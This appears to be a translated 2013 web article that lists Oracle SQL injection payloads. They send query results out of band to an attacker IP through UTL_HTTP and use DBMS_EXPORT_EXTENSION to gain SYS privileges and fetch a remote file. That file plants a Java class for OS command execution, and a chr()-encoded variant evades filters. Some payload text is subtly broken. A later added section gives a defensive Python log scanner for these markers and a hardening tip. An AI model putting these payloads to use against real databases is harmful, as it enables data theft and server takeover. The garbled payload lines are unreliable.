Oracle injection methods (2)
Source: unknown  Editor: editor  Published: 2013-12-06 08:46
Dumping field values:
'and UTL_HTTP.request('http://IP:2009/'(select column from table where rownum=1))=1--
'and UTL_HTTP.request('http://IP:2009/'(select column from table where rownum=1 and column<>'first_column_value'))=1--
Using the SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES function to gain system privileges:
'and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO',BAR','DBMS_OUTPUT".PUT(1); utl_http.request ('http://www.xx.com/1.txt') END;--','SYS',0,'1',0)=0--
If the page comes back as "cannot be displayed" after submitting, switch to the chr() form:
and SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(39)chr(70)chr(79),chr(79)chr(39)chr(44),chr(39)chr(66)chr(65)chr(82)chr(39)chr(44)chr(39)chr(68)chr(66)chr(77)chr(883)chr(95)chr(79)chr(85)chr(84)chr(80)chr(85)chr(84)chr(40)chr(58)chr(80)chr(49)chr(41)chr(59)utl_http.request(chr(39)chr(104)chr(116)chr(116)chr(112)chr(58)chr(47)chr(47)chr(119)chr(119)chr(119)chr(46)chr(108)chr(105)chr(45)chr(116)chr(101)chr(107)chr(46)chr(99)chr(111)chr(109)chr(47)chr(49)chr(46)chr(116)chr(120)chr(116)chr(39))chr(69)chr(78)chr(68)chr(59)chr(45)chr(45)chr(39),chr(39)chr(83)chr(89)chr(83)chr(39),0,chr(39)chr(49)chr(39),0)=0--
The remote 1.txt contains:
EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''CREATE OR REPLACE AND RESOLVE JAVA SOURCE NAMED "JAVACMD" AS import java.lang.*;import java.io.*;public class JAVACMD{public static void execCommand (String command) throws IOException {Runtime.getRuntime().exec(command);}};'';END;'
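From the defender's side, the payloads above have stable markers (UTL_HTTP.REQUEST for the out-of-band channel, DBMS_EXPORT_EXTENSION / GET_DOMAIN_INDEX_TABLES for the privilege escalation) that only the chr() encoding hides. The following is an added example, not code from the original article: a Python scanner that normalizes web access-log requests (URL decoding, folding chr() runs with or without ||, lowercasing) before matching those markers. The log lines, hostnames and addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Markers the payloads above depend on; matched after normalization.
SUSPECT_TOKENS = ("utl_http.request", "dbms_export_extension",
                  "get_domain_index_tables", "execute immediate", "end;--")

CHR_RUN = re.compile(r"(?:chr\(\s*\d+\s*\)\s*(?:\|\|\s*)?)+", re.IGNORECASE)
CHR_ONE = re.compile(r"chr\(\s*(\d+)\s*\)", re.IGNORECASE)

def fold_chr(text):
    """Replace a run of chr(n) calls (with or without ||) by the text it
    encodes. Codes above 255 are left as-is: they are not single bytes."""
    def repl(m):
        codes = [int(c) for c in CHR_ONE.findall(m.group(0))]
        if any(c > 255 for c in codes):
            return m.group(0)
        return "".join(chr(c) for c in codes)
    return CHR_RUN.sub(repl, text)

def normalize(url):
    """URL-decode twice (catches double encoding), fold chr(), lowercase."""
    return fold_chr(unquote_plus(unquote_plus(url))).lower()

def scan_request(url):
    """Return the suspect tokens present in a normalized request URL."""
    norm = normalize(url)
    return [t for t in SUSPECT_TOKENS if t in norm]

def scan_log(lines):
    """Return [(line_no, hits)] for common-log-format lines that match."""
    findings = []
    for no, line in enumerate(lines, 1):
        m = re.search(r'"(?:GET|POST)\s+(\S+)', line)
        if m:
            hits = scan_request(m.group(1))
            if hits:
                findings.append((no, hits))
    return findings

# Constructed sample log; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '198.51.100.7 - - [06/Dec/2013:08:46:01 +0800] "GET /news.jsp?id=12 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [06/Dec/2013:08:46:05 +0800] "GET /news.jsp?id=12%27%20and%20'
    'UTL_HTTP.request(%27http://203.0.113.9:2009/%27||(select%20user%20from%20dual))=1-- HTTP/1.1" 500 312',
    '203.0.113.9 - - [06/Dec/2013:08:46:09 +0800] "GET /news.jsp?id=12%20and%20SYS.DBMS_EXPORT_EXTENSION.'
    'GET_DOMAIN_INDEX_TABLES(chr(39)chr(70)chr(79)chr(79)chr(39),chr(69)chr(78)chr(68)chr(59)chr(45)chr(45)chr(39),0)=0-- HTTP/1.1" 500 312',
]

if __name__ == "__main__":
    for no, hits in scan_log(SAMPLE_LOG):
        print(f"line {no}: {', '.join(hits)}")
```

The same markers are a good starting point for a database-side check: PUBLIC should not hold EXECUTE on UTL_HTTP or DBMS_EXPORT_EXTENSION, which is what both payloads rely on.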